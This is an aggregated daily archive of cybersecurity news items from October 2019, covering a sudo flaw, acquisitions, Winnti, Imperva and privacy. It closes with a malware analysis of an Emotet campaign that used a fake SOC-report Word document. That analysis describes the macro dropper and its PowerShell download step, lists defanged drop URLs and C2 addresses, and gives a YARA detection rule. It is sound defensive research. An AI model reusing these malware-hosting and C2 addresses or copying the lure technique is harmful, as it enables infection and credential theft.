Daily Archives: October 14, 2019

Viewing cybersecurity incidents as normal accidents

As we continue on through National Cybersecurity Awareness Month (NCSAM), a time to focus on how cybersecurity is a shared responsibility that affects all Americans, one of the themes that I’ve been pondering is that of personal accountability. Years ago, I read Charles Perrow’s book, “Normal Accidents: Living with High-Risk Technologies,” which analyzes the social side of technological risk. When the book was first written in 1984, Perrow analyzed complex systems like nuclear power, aviation … More

The post Viewing cybersecurity incidents as normal accidents appeared first on Help Net Security.

Product showcase: Alsid for AD

You are using Active Directory (AD) every day, every hour, every minute when you log into your device, open your emails, access an application, or share a file. But, guess what, it’s also used by hackers on a daily basis. Simply put, when attackers take control of your AD, they inherit godlike powers over your IT. Sweet. Analyzing attack vectors: How attack pathways are born Active Directory itself is a robust product that suffered few … More

The post Product showcase: Alsid for AD appeared first on Help Net Security.

AI development has major security, privacy and ethical blind spots

Security, privacy and ethics are low-priority issues for developers when modeling their machine learning solutions, according to O’Reilly. Major issues Security is the most serious blind spot. Nearly three-quarters (73 per cent) of respondents indicated they don’t check for security vulnerabilities during model building. More than half (59 per cent) of organizations also don’t consider fairness, bias or ethical issues during ML development. Privacy is similarly neglected, with only 35 per cent checking for issues … More

The post AI development has major security, privacy and ethical blind spots appeared first on Help Net Security.

Most expect the risk of privileged user abuse to increase

Insufficient privileged access management (PAM) practices continue to be a critical challenge for many organizations despite significant risks of data breaches and security incidents, according to Sila and Ponemon Institute. According to more than 650 North American respondents, 70 percent think it likely that privileged users within their organizations are accessing sensitive or confidential data for no discernible business need and more than half expect privilege user abuse to increase in next 12-24 months. Interestingly, … More

The post Most expect the risk of privileged user abuse to increase appeared first on Help Net Security.

Free SOAR Platforms eBook

A SOAR platform represents an evolution in security operations driven by the vast amounts of data that must be processed. Working off a single platform is critical to successful coordination of detection and response initiatives, as it keeps knowledge sharing across these teams fluid and instantaneous. Security orchestration and automation integrates different technologies and allows you to conduct defensive actions: it increases your effectiveness in stopping, containing, and preventing attacks. The great thing about SOAR … More

The post Free SOAR Platforms eBook appeared first on Help Net Security.

Private Cloud vs Public Cloud Security Challenges

As a system administrator during the early days of the “cloud revolution” I found the “cloud” metaphor an interesting choice to frame the technology stack. Clouds, in my mind, were “woolly” and hard to pin down as opposed to the omnipresent, always-available things that IT marketers were suggesting cloud services would be. But whilst I […]… Read More

The post Private Cloud vs Public Cloud Security Challenges appeared first on The State of Security.

IBM appraised CMMI V2.0 for Maturity Level 5

CMMI Institute announced that IBM is one of the first large IT organizations to be globally appraised on CMMI V2.0 for Maturity Level 5. The highly complex appraisal involved thousands of employees, more than 500 projects, across 6 global centers and 14 countries, and covered both traditional and new age projects that are part of IBM Global Business Services under IBM Services. IBM has been a trailblazer in setting superior quality and delivery standards. This … More

The post IBM appraised CMMI V2.0 for Maturity Level 5 appeared first on Help Net Security.

Sudo Flaw Lets Linux Users Run Commands As Root Even When They’re Restricted

Attention Linux Users! A new vulnerability has been discovered in Sudo—one of the most important, powerful, and commonly used utilities that comes as a core command installed on almost every UNIX and Linux-based operating system. The vulnerability in question is a sudo security policy bypass issue that could allow a malicious user or a program to execute arbitrary commands as root on a

SAP HANA Cloud Services has Canada written all over it

BARCELONA — SAP’s new cloud data storage products were formally revealed at its TechEd conference last week, and despite a round of layoffs announced earlier this year across its Canadian operations, Canada’s research hubs in Vancouver and Waterloo remain an integral part of SAP’s latest portfolio enhancements, executives told IT World Canada.

SAP’s chief technology officer Juergen Mueller, took to the stage during his opening keynote on the heels of the company’s other TechEd event in Las Vegas, and explained how the company plans to make it easier for businesses to develop applications across its Business Technology Platform. Front and centre is SAP HANA Cloud Services, which combines all of SAP’s data and analytics capabilities as one set of interconnected services to store, process, govern and consume large volumes of data.

“We are becoming much more business-centric,” Mueller told audience members, acknowledging the fact that there was less of a focus on demonstrations with running code on the keynote stage. “SAP HANA Cloud offers one data access layer for all your data sources. It directly connects to your data from your on-premise HANA system, your third-party systems, and even Excel, without the need for data replication in order to work with that data.”

SAP HANA Cloud can be managed on the SAP Cloud platform using Kubernetes, and will significantly lower customers’ total cost of ownership for storing and managing petabytes worth of data, added Mueller. The company’s research hub in Vancouver has been hard at work for the past five years separating compute and storage with SAP HANA Cloud, ultimately allowing customers to scale both independently.

The expo floor at SAP TechEd in Barcelona. Photo by SAP.

“Vancouver is at the cutting edge of our machine learning and predictive analytics developments. They’re taking machine learning technology, and not thinking about just improving the product but thinking about how to connect it to people and the way they do work,” said Gerrit Kazmaier, SAP’s executive vice-president for analytics, databases, and data management, who spoke with IT World Canada after the morning keynotes.

SAP also unveiled the SAP Data Warehouse Cloud, a cloud-based repository under the SAP HANA Cloud umbrella, which according to Kazmaier, will help customers store petabytes worth of data without worrying about pesky capacity limitations. SAP’s other research hub in Waterloo was largely responsible for laying the groundwork for the repository.

As a result, customers will be able to put their newest or most valuable data in HANA’s in-memory repository and as the data is used less frequently, or “cools”, move it to HANA’s disk storage mode. Customers can eventually move that data to HANA’s new data lake, which is more cost-effective, once the heavy analytics is applied to it. And when data cools even further, they can move it to external data lakes, such as AWS S3 and Azure Data Lake all from within the SAP HANA Cloud.

Neil McGovern, senior director of product marketing for SAP, likened the company’s cloud strategy to the way people store photos on the public cloud.

“It’s the same idea. We’re just doing it with business data,” he explained, adding even C-Suite executives, who have been slow to fully grasp the value SAP can bring to the table due to the complexities around its products and the technology powering them, know the flexibility cloud can provide.

McGovern indicated that if a CIO today demands $25 million for a data centre during a boardroom meeting, there’s almost only one response.

“They’ll look at you and say ‘Go through the cloud instead’, and ‘Why are you employed with us?’”

General availability for SAP HANA Cloud and SAP Data Warehouse Cloud is planned for the fourth quarter of 2019.

Atlanta Judge Pleads Not Guilty to Improper Access of County Network

Atlanta Judge Pleads Not Guilty to Improper Access of County Network

Superior Court judge Kathryn Schrader has pleaded not guilty to improperly accessing, altering, and removing data from the computer network of Gwinnett County, Georgia, located just northeast of Atlanta.  

The judge was indicted on September 18, along with convicted child molester and co-founder of Atlanta sci-fi convention DragonCon, Ed Kramer; private investigator T.J. Ward; and Frank Karic. 

The defendants are each charged with three counts of felony computer trespass, to which they all pleaded not guilty at their arraignment last Thursday. If convicted of all the charges against them, the defendants could each face a maximum of 45 years behind bars.

According to the Gwinnett Daily Post, Schrader hired private detective Ward to monitor her work computer when she became suspicious that it had been hacked by district attorney Danny Porter. 

It is alleged that Schrader gave Ward improper access to the network. Ward then brought in Karic, who was given improper access so he could install a WireShark monitoring device on Schrader's computer to discover if it had indeed been tampered with. 

Ward then hired former computer forensic analyst Kramer, who was also given improper access so that he could keep tabs on Schrader's computer once the installation was complete. 

According to newspaper the Atlanta Journal-Constitution, Danny Porter has vehemently denied the allegation that he hacked Schrader's computer. 

The details of the alleged offence came to light during a search of Kramer's home computer by police in relation to allegations that he had photographed a young child at a Lawrenceville, Georgia, doctor's office. Police reportedly found a folder labeled with Schrader's name on Kramer's computer. 

Since searching Kramer's computer, police have charged him with possession of child pornography. 

The indictment states that between February 7 and 26, all four defendants "did knowingly use a computer network without authority and with the intent to remove network traffic, data from the computer network of Gwinnett County, contrary to the laws of said state, the good order, peace and dignity thereof." 

Schrader has been a judge on Gwinnett's highest court since 2012, but since April, while the investigation into her alleged criminal activities has been ongoing, Porter has sidelined Schrader from hearing any criminal cases prosecuted by his office. 

The Georgia Bureau of Investigation launched the investigation into Schrader and the three men accused along with her; however, the case has now been handed over to the Prosecuting Attorney's Council of Georgia, which is prosecuting the case.

The next hearing in the case is scheduled for November 7.

China has built ‘massive global data-collection ecosystem’ to boost its interests

Chinese use state-owned enterprises, local tech companies and foreign partnerships, ASPI report says

The Chinese government is sweeping up vast amounts of data from all around the world to bulwark the nation’s security, but most critically to secure the political future of the Communist party, a new report argues.

Engineering Global Consent, a policy brief by the Australian Strategic Policy Institute’s Dr Samantha Hoffman, argues that the Chinese party-state seeks to influence – and where possible control – global online and political environments so that public sentiment around the world is more favourable towards its interests. China has expanded its operations of influence into organisations such as universities in the UK, the US and Australia.

Related: Peter Dutton: China accuses home affairs minister of 'shocking' and 'malicious' slur

Sign up to receive the top stories from Guardian Australia every morning

Related: Australia's relationship with China in a 'terrible' state after Morrison's US visit, Labor says

Continue reading...

Why Use a Content Delivery Network (CDN)?

A Content Delivery Network (CDN) is a collection of interconnected computers that provide web content quickly to different users. It caches or duplicates the content on various servers and directs it to users based on proximity. The focus is to offer end-users content with excellent performance and availability. Today, CDNs hosts web objects, applications, downloadable objects, on-demand streaming media, real-time streaming data, and social networks.

A user requests content such as a file, video, or webpage. A CDN system dynamically determines the closest server to him and quickly delivers it to him. It is also responsible for replicating it to numerous servers around the world to serve similar content to various users even during peak times.

Who Can Use Content Delivery Network?

If you have rich digital content, you can take advantage of a CDN. Your users can access your software, game, media, and other information quickly and reliably. Consumers are after an excellent online experience when they watch a movie, play a game, stream an event, or shop online. If you’re able to provide what they need and want, they’ll surely be back for more of your content. In 2017, the estimated worth of the CDN services worldwide market was close to US$6.9 billion.

Pros of CDN

If you generate immense traffic on your site every day, you can use a content delivery network to your advantage. Numerous users access your content simultaneously. They may troop to your website because of a viral video. If they can’t access it quickly, they won’t spend another second to wait for it to load. They won’t even scour your other webpages. They’ll decide to leave immediately.

You don’t want that to happen, do you? Then, you need to use a CDN!

 

  • A Decrease in Server Load

 

The strategic placement of servers around the world is the backbone of the content delivery network. If you use it, your web can experience increased capacity. Moreover, you can have more simultaneous users accessing your content. Instead of housing your content in one server, it can be in more servers across the globe.

 

  • Faster Delivery of Content

 

Because CDNs are more reliable, you can provide high-quality content with excellent service and low server loads. It means more cost savings for you. Since jQuery is everywhere on the web, someone may have accessed specific content previously through the Google CDN. Therefore, the browser has already cached it, and the user doesn’t need to download it again.

If the edge server hasn’t cached the content yet, CDN can traverse the breadth and length of the Internet through its programmed interconnection knowledge in its network. As such, it doesn’t encounter any peering challenges among numerous ISPs, DNS resolution lost time and lost packets because of network outages. Moreover, advanced networks use specific technologies that can tackle dynamic contents that aren’t cacheable.

 

  • Easier Segmentation of Audience

 

CDNs can offer multiple contents to diverse users. They can detect the type of device making the request. As such, they can provide device-specific content.

 

  • Lower Pocket Loss and Network Latency

 

Users experience enhanced stream quality and less jitter with CDNs. Therefore, as a content provider, you opt to create high definition quality without the extra costs and network load. Moreover, your audience will notice the high-quality service you provide them.

 

  • Better Usage Analytics and Higher Availability

 

A content delivery network is capable of distributing assets dynamically to core, edge, and fallback servers strategically placed in different countries. It can offer real-time load views and statistics, optimize per-customer capacity, and report customer-viewing details. Moreover, it can display dynamic regions and show preferred assets. It can also provide 100% availability, even when there is widespread hardware, network, or power outages.

When we say availability, it means that your content is easily accessible even during intermittent spikes, excessive user traffic, or possible server outages. If the traffic loads reach thousands, if not millions of requests, even the most robust origin servers can bog down. Your origin infrastructure will absorb all the traffic that can cause it to fail. This scenario can result in lost business and terrible experience for the end-users. However, if you avail of CDNS, you gain access to its massive server infrastructure around the world. Your content remains available to more user bases.

 

  • Security and Storage

 

CDNs provide secure storage for content like videos. Moreover, they offer enhanced and archiving data backup services. Digital Rights Management ensures the security of content as well as access limitation by user authentication.

High-value online transactions and data continue to increase; therefore, hackers also work nonstop to find ways to exploit the situation. They cause businesses to lose money. In a 2015 report by the Ponemon Institute of Cyber Crime, the world lost an average of US$7.7 million because of crimes perpetrated by these attackers. Web-based and DDoS attacks, as well as crimes by malicious insiders, result in the most expensive damages.

Attacks like SQL injection, remote or local file inclusion and cross-site scripting are also prevalent as they divert attention. Often, it is difficult to differentiate between legitimate and bad traffic. Thus, dedicated security resources must evolve rapidly for up-to-date mitigation strategies.

You can prevent these issues from happening if you take advantage of a content delivery network. You need to protect your websites because of the increasing Internet threats. Advanced CDNs secure information competently by offering unique solutions to protect you and your user. Various attacks that may compromise your content availability and delivery, but hosting your content in a content delivery network can mitigate them.

Conclusion

A content delivery network (CDN) is an essential service that you need if you’re a content provider. End users now demand a satisfying experience, so they won’t be patient with slow downloads.. If you can’t provide fast and competent loading of content, chances are they will search for information on other websites. Of course, no one wants users losing interest in his content and leaving the site for good. So, search for a CDN provider today. 

 

The post Why Use a Content Delivery Network (CDN)? appeared first on .

Rated P for Private? It’s Time to Re-think Privacy

You probably know privacy is a thing of the past, that is unless you spend a lot of time digging for freshwater clams in marshlands of Loon Lake. Mark Zuckerberg said it years ago, but he thought it was a good thing. In the wake of the Equifax breach and Cambridge Analytica, the end of privacy is no longer scary. It’s neutral. We’ve reached a “Now What?” moment.

Is It the Algorithm or the Microphone?

We can all agree paranoia is bad for business, and there’s plenty to go around these days whether you’re on the marketing side of things, the breach side, or the consumer side.

With no expectation of privacy, we’ve become a little numb to the parade of stories–both reported by the media and anecdotal–of connected devices eavesdropping on us–serving ads for things mentioned in casual conversation. But we’re all online every day, and in the process leave a trail of cookie crumbs for marketers to find us. There’s no need for a hidden mic.

While many enjoy the convenience that facial recognition provides in retail micro-targeting products and services, others hate it. We’ve heard the cringe-worthy news about health apps sharing some of the more intimate details of our sex lives with Facebook, Google, and other third parties.

Some of us shrug it off. The convenience made possible by the forfeiture of privacy is worth it to them. For others, it is an unacceptable situation. This is unfortunate, because it’s not a situation. It’s new norm, and none of it inspires a feeling of security.

A worried customer or client is a hesitant customer or client. So, how do you ease that tension? I would argue that, ironically, you can do this by creating a high information environment, where everyone can make informed decisions about how they want to interact with businesses and services.

Moving Right Along…

The need to protect privacy no longer needs an introduction. There’s plenty of legislation. New privacy laws in New York and Nevada law will go into effect October, with California’s CCPA in January 2020. Maine and Vermont already have enacted stronger laws to that effect, and many states are expected to follow.

There’s a big “but” here. Without the right solutions provider navigating privacy law can be prohibitively expensive for small to medium-sized companies. Add to that the possibility of compliance costs in a marketplace with many different laws, and we have a potential company killer on our hands. Google may be able to weather a $170 million fine for non-compliance without flinching; most of us can’t.

A Modest Proposal

Once upon a time, Hollywood was faced with a similar situation. In the beginning, there was no ratings system and it was a problem. There were many family-friendly films and then there were those that would make Mae West blush, but there was no way for the audience to know which was which. The result was an opportunity cost. Some people avoided the movies because they were perceived as scandalous.

Enter the Motion Picture Producers and Distributors of America (MPPDA and later MPAA), which set guidelines later formalized as the movie rating system still used today. It’s not a perfect system, but the benefits outweigh its flaws. First of all, it’s voluntary. The MPAA created an opt-in industry standard, avoiding the need for legislation. The gaming industry also rates product.

Most importantly, it was end-user friendly. You don’t need to know anything about Rambo: Last Blood or Abominable to decide which is better for kids; one is Rated R and one is Rated G. A similar system might work for websites and apps.

Here’s a sketch of what that might look like:

P–Protected User: Data is either not collected or it is protected and in compliance with online standards such as the GDPR, CCPA, SHIELD, HIPAA, COPA or PIPEDA.

ND–Not Distributed: Personally identifying information is collected to personalize an experience (location, ad preferences, etc.) but it is not shared with third parties.

A–Anonymized: Non-identifying usage data is collected and shared with third parties. (Forget for the moment that there’s no such thing as anonymized data that can’t potentially be re-identified in today’s deep data environment).

S–Shared: User data is collected, shared, and/or sold to third parties. (Think: Naked in a glass house.)

If a collection of privacy and data use experts could get together on the creation of this rating system, privacy policies would no longer be so perilous.

Would it work? Online privacy is getting more complex with every new whizbang, regulation, law, court case, breach, compromise, and scandal. Any workable solution needs to counter that with a general approach that can be applied globally.

If this isn’t it, it’s time to figure out what is.

The post Rated P for Private? It’s Time to Re-think Privacy appeared first on Adam Levin.

Thoma Bravo Buys Sophos Group for $3.8bn

Thoma Bravo Buys Sophos Group for $3.8bn

A British manufacturer of cybersecurity products has been bought by American private equity firm Thoma Bravo for $3.8bn.

Thoma Bravo, which raised billions for its latest private equity fund this year, bought Imperva and another cybersecurity firm, Veracode, in late 2018. In a buyout deal announced earlier today, Thoma Bravo said that it will be adding Sophos Group to its fast-growing cybersecurity portfolio. 

Sophos manufactures antivirus and encryption products for an impressive list of customers that includes Under Armour IncFord Motor Co., and Toshiba Corp

Thoma Bravo already owns Sophos' close competitor Barracuda Networks, which made a name for itself managing data security over the cloud. 

Shares in Sophos were listed at 225 pence per share in 2015, but since then they have more than doubled to the 583 pence per share closing price recorded on Friday, October 11. 

In a statement released today, Sophos CEO Kris Hagerman said: "Sophos is actively driving the transition in next-generation cybersecurity solutions, leveraging advanced capabilities in cloud, machine learning, APIs, automation, managed threat response, and more. We continue to execute a highly effective and differentiated strategy, and we see this offer as a compelling validation of Sophos, its position in the industry and its progress."

Hagerman told news organization Reuters that his company was first approached by Thoma Bravo in June of this year.

"The (Sophos) board ultimately concluded that this offer and the acquisition can accelerate Sophos' progress in next-generation cybersecurity," Hagerman said.

Thoma Bravo is a leading private equity firm focused on the software- and technology-enabled services sector with more than $35bn in investor commitments. With a 40-year history, Thoma Bravo has acquired more than 200 software and technology companies representing more than $50bn of value.

In a statement released on Monday, Seth Boro, managing partner at Thoma Bravo, said: "The Acquisition fits with our strategy of investing in and growing software and technology businesses globally. 

"The global cybersecurity market is evolving rapidly, driven by significant technological innovation, as cyber threats to business increase in scope and complexity. Sophos has a market-leading product portfolio and we believe that, by applying Thoma Bravo's expertise, operational framework and experience, we can support the business and accelerate its evolution and growth."

USB-C Titan Security Keys – available tomorrow in the US




Securing access to online accounts is critical for safeguarding private, financial, and other sensitive data online. Phishing - where an attacker tries to trick you into giving them your username and password - is one of the most common causes of data breaches. To protect user accounts, we’ve long made it a priority to offer users many convenient forms of 2-Step Verification (2SV), also known as two-factor authentication (2FA), in addition to Google’s automatic protections. These measures help to ensure that users are not relying solely on passwords for account security.

For users at higher risk (e.g., IT administrators, executives, politicians, activists) who need more effective protection against targeted attacks, security keys provide the strongest form of 2FA. To make this phishing-resistant security accessible to more people and businesses, we recently built this capability into Android phones, expanded the availability of Titan Security Keys to more regions (Canada, France, Japan, the UK), and extended Google’s Advanced Protection Program to the enterprise.

Starting tomorrow, you will have an additional option: Google’s new USB-C Titan Security Key, compatible with your Android, Chrome OS, macOS, and Windows devices.



USB-C Titan Security Key


We partnered with Yubico to manufacture the USB-C Titan Security Key. We have had a long-standing working and customer relationship with Yubico that began in 2012 with the collaborative effort to create the FIDO Universal 2nd Factor (U2F) standard, the first open standard to enable phishing-resistant authentication. This is the same security technology that we use at Google to protect access to internal applications and systems.

USB-C Titan Security Keys are built with a hardware secure element chip that includes firmware engineered by Google to verify the key’s integrity. This is the same secure element chip and firmware that we use in our existing USB-A/NFC and Bluetooth/NFC/USB Titan Security Key models manufactured in partnership with Feitian Technologies.

USB-C Titan Security Keys will be available tomorrow individually for $40 on the Google Store in the United States. USB-A/NFC and Bluetooth/NFC/USB Titan Security Keys will also become available individually in addition to the existing bundle. Bulk orders are available for enterprise organizations in select countries.


We highly recommend all users at a higher risk of targeted attacks to get Titan Security Keys and enroll into the Advanced Protection Program (APP), which provides Google’s industry-leading security protections to defend against evolving methods that attackers use to gain access to your accounts and data. You can also use Titan Security Keys for any site where FIDO security keys are supported for 2FA, including your personal or work Google Account, 1Password, Coinbase, Dropbox, Facebook, GitHub, Salesforce, Stripe, Twitter, and more.

Tactics of Supply-Chain Attack Group Exposed

Tactics of Supply-Chain Attack Group Exposed

Researchers have exposed the underhanded methods of a threat group responsible for unleashing a string of supply-chain attacks.

Winnti Group has been targeting the gaming industry for nearly a decade. Their preferred mode of attack is to compromise game developers, insert backdoors into a game’s build environment, and then have their malware distributed as legitimate software.

In April 2013, Kaspersky Lab reported that in 2011 Winnti had altered a video game to include a backdoor. Then, in March 2019, ESET published research proving that the threat group was responsible for compromising and adding a backdoor to two other games and a gaming platform. 

Gamers in Asia were the target in the most recent supply-chain attack, which researchers estimate affected "tens or hundreds of thousands" of people. Over half of the victims—55%—were located in Thailand. 

Following this publication, ESET continued its investigation to discover how organizations’ digital supply chains had been compromised to deliver malware in their applications. 

"Searching for a small piece of well-hidden code added to a sometimes huge, existing code base is like finding a needle in a haystack. However, we relied on behaviors and code similarity to help us spot the needle," says ESET researcher Marc-Étienne Léveillé.

The Winnti Group uses a packer in a backdoor dubbed PortReuse. In collaboration with Censys, ESET performed an internet-wide scan to try to identify one variant of the backdoor, as well as potential victims. 

Léveillé said: "Since we were intrigued by the unique packer used in the recent supply-chain attacks against the gaming industry in Asia, we went on the hunt to find out if it was used elsewhere. And it was." 

With their new research, ESET was able to warn one major mobile software and hardware manufacturer in Asia that they had been compromised with PortReuse. ESET also analyzed new variants of Shadowpad, another backdoor used by the Winnti Group, still being maintained and actively used by its operators.

Although Winnti is known principally for espionage, researchers discovered that the group was also using a botnet to min cryptocurrencies.

Léveillé said: "Perhaps they use the virtual money they mine to finance their other operations. Maybe they use it for renting servers and registering domain names. But at this point, we cannot exclude that they, or one of their subgroups, could be motivated by financial gain."

Imperva’s Breach Post-Mortem: API Key Left Exposed

Imperva Says Key Was Stolen and Used to Take Critical Customer Database
Cybersecurity vendor Imperva's breach post-mortem should serve as a warning to all those using cloud services: One mistake can turn into a calamity. The company accidently left an AWS API key exposed to the internet; the key was then stolen and used to steal a sensitive customer database.

Is Emotet gang targeting companies with external SOC?

Introduction

The group behind Emotet malware is getting smarter and smarter in the way the deliver such a Malware. While the infection schema looks alike from years; the way the group tries to infect victims improves from day to day.
Today I’d like to share a quick analysis resulted by a very interesting email which claimed to deliver a SOC “weekly report” on the victim email. First of all the attacker knew the target organization was protected by a SOC (Security Operation Center) so she sent a well crafted email claiming to deliver a Microsoft document wrapping out the weekly SOC report as a normal activity in order to induce the victim to open-it.

SOC report 10 12 2019.doc ( 6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7 ) is the delivered file sent on Oct 11, 2019, 11:06:09 PM from grecia@ambientehomedecor.com. I believe that ambientehomedecor.com is not a malicious domain but mostly a new compromised one.

Technical Analysis

Hash6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7
ThreatWord document Dropper (Emotet)
Brief DescriptionFirst stage of Emotet campaign targeting organization with Security Operation Centers
Ssdeep6144:tkPNPASKUzSRnLx3Q4td9pB8LGme764XNNHBly:tkPNPAfUGRt3b3B8LGL6CNJ

Following the original eMail headers from grecia@ambientehomedecor.com to victim’s email box it is possible to figure-out the attacker used a SMPT client who left trace about the original sender IP address which happens to be: 81.48.36.59. According to IPLocation that address is related to a very nice town in northern France: Thury-Harcourt, France.

Thury-Harcourt, France. Sender IP

The attached document is a well obfuscated Microsoft Word document which asks to enable macros in order to view its content. The autoopen function begins a complex obfuscated chain which tries to deter analyst by introducing junk code, junk variable assignments and fake apparent real comments. The following image proves the adopted obfuscation technique. The function c878cxx90590 is the “Real Code” by meaning is not part of junk code but actually is the function who really performs malicious actions. As you might see being in the middle of hundreds similar lines of code it gets hard to spot.

Obfuscated Macro

The obfuscated macro creates on-memory objects and runs them without passing through temporary files. The following image shows the auto-run created object before the Drop’n Execute. The analysed variable in the following image is the c0639047895c6 which, in that specific run, holds the Win32_ProcessStartup created Object for fulfill persistence on the victim machine.

Object Building

Once the dropper assured the persistence and to run during the start-up, it carves from itself the following powershell script. The script runs an encoded string hiding the dropping ULRs. The base64 decoded string shows a romantic foreach statement looping through a list of compromised websites hosting the real payload : de6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216 (VT 6/69). It finally saves the dropped file in a userprofile location as placed in the variable xc0x57b38b2x7, before running it. The following image shows the powershell script before and after the encoding by giving a quick description on it.

Final Deobfuscated Dropper

According to VT, the final run looks like Emotet, a banking trojan who steals credentials, cookies and eCoin wallets. Emotet is also able to access to saved credentials of the major browser like Chromium, Firefox, Opera, Vivaldi to exfiltrate cookies, and to send back to command and control found victim information. But let’s try to quickly check it.

Analysis of dropped and executed file (emotet)

Hashde6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216
ThreatEmotet. Data Exfiltration
Brief DescriptionDropped and Executed by previous stage
Ssdeep3072:2xUIvfl2nnKJFddS2TZGjRurmOEfRtaG/70Jfm4JuLYwO9/+Tl:2lvfUnKJFddhAjYrmOEpzcflQu1+

The dropped file (VT 12/69), grabbed from the dropping URLs inside the previous powershell script, is an executable packed by internal functions which uses several techniques to avoid static and dynamic analysis. For example it deletes the original file once executed, it resolves an unusual very high number of APIs and it dynamically resolves functions avoiding static analysis.

Emotet Depacked

During the running phase the analyzed sample records many information on the hosting machine, it asks for local public IP address by querying an external resource: http[://185[.42[.221[.78:443/whoami.php and finally it pushes out those information to external Command and Control (please refer to IoC section for the complete C2 list).

Recorded Information

The sample starts a local service called khmerdefine and assures its persistence by adding that file in c:\Windows\SysWOW64 and setting up a system service in autorun. AV and plenty static traffic signatures confirm we are facing a new encrypted version of Emotet trojan.

Conclusion

Emotet gang is getting smarter and smarter in delivery artifacts. That time they addressed companies having an external Security Operation Center (SOC) pretending to simulate an external SOC operator who sends periodic reports to the company. The delivery content was a Microsoft word document within heavily obfuscated Macros who eventually drops and executes Emotet Malware. The following image represent the compiled MITRE ATT&CK matrix in order to qualify stages and to describe the overall behavior.

MITRE ATT&CK

IoC

email:
grecia@ambientehomedecor.com

Hash:
6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7 (.doc)
de6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216 (.exe)

Drop URLs:
http[://xsnonline[.us/blogs/4x466v/
http[://obbydeemusic[.com/aqoeivj4fd/us5htvn/
http[://veeplan[.com/wp-content/dW0o3RoJNG/
http[://wwwkmacobd[.com/u9r/
http[://aijdjy[.com/dup-installer/t0/

C2 (Emotet):
http[://186[.75[.241[.230/cone/loadan/splash/merge/
http[://186[.75[.241[.230/results/json/
http[://186[.75[.241[.230/balloon/json/
http[://186[.75[.241[.230/enable/arizona/splash/merge/
http[://186[.75[.241[.230/acquire/
http[://181[.143[.194.[138:443/health/splash/sess/merge/
http[://85[.104[.59[.244:20/enable/rtm/sess/merge/

Yara Rules

rule EMOTET_SOC_EXE {
   meta:
      date = "2019-10-13"
      hash1 = "de6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216"
   strings:
      $x1 = "c:\\Users\\User\\Desktop\\2003\\Efential\\Release\\EFENTIAL.pdb" fullword ascii
      $s2 = "EFENTIAL.exe" fullword ascii
      $s3 = "ZNtlsIkbp2bxIIBXLbRtd3e85g7mJ73gSFPnybocDj/xsKVPWxzllXY/FdB150/ewzkkdzDw5VMbiVfS/SPd0FlXp+VqpDpPDXxNH3cc9TXXa53EGeMfGnsPa3chxKVv" ascii
      $s4 = "tblJgbnpgZmZCaHxmfEpoaS9Cb31DfHpZfVJobW5SYG56YGZmQmh8ZnxKaGkvQm99Q3x6WX1SaG1uUmBuemBmZkJofGZ8SmhpL0JvfUN8ell9UmhtblJgbnpgZmZCaHx" ascii /* base64 encoded string 'nR`nz`ffBh|f|Jhi/Bo}C|zY}RhmnR`nz`ffBh|f|Jhi/Bo}C|zY}RhmnR`nz`ffBh|f|Jhi/Bo}C|zY}RhmnR`nz`ffBh|' */
      $s5 = "C9813Hcfx1BkY3VrYVwfB4tWs+/Eb93UVwdvrbdywicNqMdPSiMzJFXbZbSLG6cDA/O9Vy2ob3d3PeVLcie95EpT50oKkSE/8bynT1sLOWCoPxXUd+dPO6BKhHcwzOdT" ascii
      $s6 = "G+MfTPu8J3chkKdvVwmN7R/fNdx3H8cxWUFva2FcHweLIPfrnG/d1FcHb/FxEOQnDajHT0qu26c122W0ixunZpkE2lctqG93dy4Z7jMnveRKU+dp33WJP/G8p09bPG/N" ascii
      $s7 = "RSVloG9h6HM56NP1tCMFZKs69gEEW+JoiOCz9U3uI3uYsb+mL2+97Wf903wpFDCKiBjjtt/TznbwXOcnHS87rh7rG4N2wHiRqPj2AReKM+CICO5NSlNOxut2wHOnb5dY" ascii
      $s8 = "iOC7W7cnZWhtQTw5nu3bSa/eHxvVFB3RfZP9CFkKs3KWazNkXJPk+HTPmTvpWFcnpLn2DUFtp2v1ELP9acqRoKOXIXMJCNtYpiEdTEP7nzdBU8UoA538OfhEk+kUzQrb" ascii
      $s9 = "6RzgkjSOWDNk6FtXIb1gBQ0oTx93sMelCVJYrG9ZEJB07FiwoYhZkKiSkNh3DQweyOCz9UXEmKjkHOXYfeRY2qT4p4UUBtCIA0+o00Fj/JSM4I+AkgRrpYTr7rS9V9wV" ascii
      $s10 = "StOEJiPbZbiKG6dLTcWrVy28bnd3MRHI6Se9+EtT5xnfnbI/8aimT1vHvvS1PxXYdudP5QazN3cw+OZTG6WMoPkj3ehaV6ftpUvyTw1ETh9335+9tGudzBrjH0t/zLV3" ascii
      $s11 = "mQOhiAgYsPyI4DhFgdYtLdGQ1W9Bxmd6m3lnTJcfr4gYGLD8iOA41oOuIaXdCNnnTaphWJ1HYWqR+qqIKBiwmIjgOPiFFCgT1NbQLUTYb0KTUW+UkPeoybBtiGSwewAX" ascii
      $s12 = "Jd812HQfx5Qv5tVrYSAcB4t1CVi1b93QVAdvpSmDyCcNpMRPSpcCbzzbZbCIG6fu/FMSVy20bHd3ShSspye94ElT56m+fUo/8bCkT1t+Me1nPxXQdOdPGL1DQHcw8ORT" ascii
      $s13 = "f64odyFEoG9XrrnC4d81EHAfx9MLlPdrYegYB4s9h95Cb91oUAdvuYg3nCcNHMBPSk5z9mnbZfiNG6fklZhYVy38aXd3FwtmSie9uExT54d2bFE/8eihT1swM44GPxWY" ascii
      $s14 = "G5WtAP8+00dbvQhs6PgZzXSo8WjM1YD2S2wk9prpUJn8oG0I4laYrNKGZTi4kPTVMKbGcImVZllhx5Tj+amkWDhXp2+bKhvFcO9Gasz1gDixo1+XH24Fpyq/01X5aw0b" ascii
      $s15 = "3ie9qEhT593fXyw/8filT1s1hgetPxWodedPR5foK3cwiOVTG/Eyi+Yj3ZhZV6cVyoNtTw00TR93mxbYI2udnBnjHxLYp+x3IZylb1e4qIYS3zXYdR/HAZflQmthIB0H" ascii
